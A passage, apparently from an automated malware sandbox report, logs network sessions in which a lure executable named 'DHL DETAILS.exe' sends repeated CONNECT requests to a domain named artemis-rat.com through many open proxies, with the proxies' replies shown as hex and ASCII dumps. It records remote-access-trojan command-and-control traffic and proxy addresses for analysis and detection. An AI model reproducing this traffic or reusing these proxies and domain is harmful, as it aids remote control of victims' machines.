                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    569192.168.2.551655193.239.58.9280816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.579408884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    570192.168.2.551762104.16.230.163806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.581738949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.736872911 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    571192.168.2.551771104.16.105.207806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.584280014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.738730907 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    572192.168.2.55166045.138.87.23810806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.586133957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    573192.168.2.551666185.49.30.580816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.587697029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    574192.168.2.55123145.124.113.695006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.590761900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.782793045 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                    Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    575192.168.2.551657128.199.251.21980006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.593297005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.942869902 CET19INHTTP/1.0 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    576192.168.2.551659159.223.71.71618186352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.593641043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.301825047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.536448956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.724040985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    577192.168.2.551664104.248.158.78617256352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.597069979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.286251068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.334062099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.536550045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    578192.168.2.551750107.181.168.14541456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.629820108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    579192.168.2.55164549.4.48.12888886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.629825115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    580192.168.2.55165849.228.131.16950006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.630172014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    581192.168.2.551205189.240.60.16490906352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.630188942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.723942995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.167239904 CET72INHTTP/1.1 200 Connection established
                                                                                    Proxy-Agent: Fortinet-Proxy/1.0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    582192.168.2.55168260.188.102.225180806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.630615950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    583192.168.2.55176338.54.101.25490006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.631839991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.812968016 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    584192.168.2.55164189.218.8.15210806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.638541937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.442481995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    585192.168.2.551673139.129.162.6531286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.656234980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.038139105 CET1286INHTTP/1.1 503 Service Unavailable
                                                                                    Server: squid/3.3.8
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 3556
                                                                                    X-Squid-Error: ERR_DNS_FAIL 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;b


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    586192.168.2.551808198.57.211.235110966352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.658224106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.114342928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.677819967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.781399965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.974019051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.177413940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    587192.168.2.5517008.130.39.15533896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.659204960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.348722935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.334244013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.333462000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.885083914 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    588192.168.2.551691128.199.196.31388326352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.660527945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
